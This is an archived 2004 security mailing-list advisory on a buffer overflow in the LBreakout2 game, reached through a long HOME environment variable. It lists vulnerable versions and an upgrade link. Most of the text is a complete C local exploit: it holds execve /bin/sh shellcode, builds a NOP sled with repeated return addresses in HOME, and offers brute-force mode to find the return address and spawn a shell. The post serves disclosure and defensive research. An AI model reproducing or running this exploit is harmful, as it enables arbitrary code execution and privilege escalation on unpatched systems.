[EXPL] LBreakout2 (Long HOME Environment Variable)

From: SecuriTeam (support_at_securiteam.com)
Date: 02/25/04

  • Next message: SecuriTeam: "[NT] Multiple TYPSoft FTP Server Vulnerabilities (//../qwerty)"
    To: list@securiteam.com
    Date: 25 Feb 2004 15:52:24 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      LBreakout2 (Long HOME Environment Variable)
    ------------------------------------------------------------------------

    SUMMARY

    About <http://lgames.sourceforge.net/index.php?project=LBreakout2>
    LBreakout2: "The successor to LBreakout offers you a new challenge in more
    than 50 levels with loads of new bonuses (goldshower, joker, explosive
    balls, bonus magnet ...), maluses (chaos, darkness, weak balls, malus
    magnet ...) and special bricks (growing bricks, explosive bricks,
    regenerative bricks ...)". A buffer overflow in LBreakout allows a
    malicious user to overflow an internal buffer in the program causing it to
    execute arbitrary code.

    DETAILS

    Vulnerable Systems:
     * breakout2 version 2.4beta-2 and below

    Immune Systems:
     * lbreakout version 2-2.5beta-3

    Vendor Status:
    Upgrade to the newest version:
    <http://lgames.sourceforge.net/download.php?project=LBreakout2&url=http://ftp1.sourceforge.net/lgames/lbreakout2-2.5beta-3.tar.gz> lbreakout2-2.5beta-3.tar.gz

    Exploit Code:
    /*
     * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
     * vulnerability reported by Ulf Harnhammar <
    Ulf.Harnhammar.9485@student.uu.se>
     * usage: ./lbreakout2-exp [-r < RET>][-b [-s < STARTING_RET>]]
     *
     */

    #include < stdio.h>
    #include < stdlib.h>
    #include < unistd.h>
    #include < sys/wait.h>
    #include < sys/types.h>
    #include < errno.h>

    #define BSIZE 200
    #define D_START 0xbfffffff
    #define PATH "/usr/local/bin/lbreakout2"

    void exec_vuln();
    int tease();
    int make_string(long ret_addr);
    int bruteforce(long start);
    void banner(char *argv);

    char shellcode[]=
          "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
          "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

    char *buffer,*ptr;

    int
    main(int argc,char *argv[])
    {
          char * option_list = "br:s:";
          int option,brute = 0,opterr = 0;
          long ret,start = D_START;

          if (argc < 2) banner(argv[0]);

          while((option = getopt(argc,argv,option_list)) != -1)
              switch(option)
              {
                  case 'b':
                      brute = 1;
                      break;
                  case 'r':
                      ret = strtoul(optarg,NULL,0);
                      make_string(ret);
                      tease();
                      exit(1);
                      break;
                  case 's':
                      start = strtoul(optarg,NULL,0);
                      break;
                  case '?':
                      fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
                      banner(argv[0]);
                      exit(1);
              }

          if(brute)
              bruteforce(start);

          return 0;
    }

    void
    exec_vuln()
    {
          execl(PATH,PATH,NULL);
    }

    int
    tease()
    {
          pid_t pid;
          pid_t wpid;
          int status;

          pid = fork();

          if (pid == -1)
          {
              fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno));
              exit(13);
          }
          else if (pid == 0)
          {
              exec_vuln();
          }
          else
          {
              wpid = wait(&status);
              if (wpid == -1)
              {
                  fprintf(stderr,"[-] %s: wait()\n",strerror(errno));
                  return 1;
              }
              else if (wpid != pid)
                  abort();
              else
              {
                  if (WIFEXITED(status))
                  {
                      fprintf(stdout,"[+] Exited: shell's ret code =
    %d\n",WEXITSTATUS(status));
                      return WEXITSTATUS(status);
                  }
                  else if (WIFSIGNALED(status))
                      return WTERMSIG(status);
                  else
                      fprintf(stderr,"[-] Stopped.\n");
              }
          }
          return 1;
    }

    int
    make_string(long ret_addr)
    {
          int i;
          long ret,addr,*addr_ptr;

          buffer = (char *)malloc(1024);
          if(!buffer)
          {
              fprintf(stderr,"[-] Can't allocate memory\n");
              exit(-1);
          }

          ret = ret_addr;

          ptr = buffer;

          memset(ptr,0x90,BSIZE-strlen(shellcode));
          ptr += BSIZE-strlen(shellcode);

          memcpy(ptr,shellcode,strlen(shellcode));
          ptr += strlen(shellcode);

          addr_ptr = (long *)ptr;
          for(i=0;i< 200;i++)
              *(addr_ptr++) = ret;
          ptr = (char *)addr_ptr;
          *ptr = 0;

          setenv("HOME",buffer,1);
          return 0;
    }

    int
    bruteforce(long start)
    {
          int ret;
          long i;

          fprintf(stdout,"[+] Starting bruteforcing...\n");

          for(i=start;i< 0;i=i-50)
          {
              fprintf(stdout,"[+] Testing 0x%x...\n",i);
              make_string(i);
              ret=tease();
              if(ret==0)
              {
                  fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
                  break;
              }
          }

          return 0;
    }

    void
    banner(char *argv)
    {
          fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by
    Li0n7@voila.fr\n");
          fprintf(stderr,"vulnerability reported by Ulf Harnhammar
    <Ulf.Harnhammar.9485@student.uu.se>\n");
          fprintf(stderr,"usage: %s [-r < RET>][-b [-s <
    STARTING_RET>]]\n",argv);
          exit(1);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:Li0n7@voila.fr> li0n7.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Multiple TYPSoft FTP Server Vulnerabilities (//../qwerty)"

    Relevant Pages

    • [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine 2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell; ...
      (Securiteam)
    • [EXPL] pServ User-Agent Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... User-Agent data handling allows remote attackers to cause pServ to execute ... int op_plat_num; ... void getshell; ...
      (Securiteam)
    • [NEWS] Festalon Heap Corruption
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void fwbof(FILE *fd, int len, int chr); ... void fwi08(FILE *fd, int num) { ...
      (Securiteam)
    • [UNIX] Linux Kernel uselib() Privilege Elevation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... static int load_elf_library ... Obviously, if the kmem_cache_alloccall sleeps, the newly created VMA ... void fatal ...
      (Securiteam)
    • [EXPL] EPIC4 CTCP Nicknames Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void send_mes(int fd,char *host); ... void wait_connection; ... unsigned int check_version = 0; ...
      (Securiteam)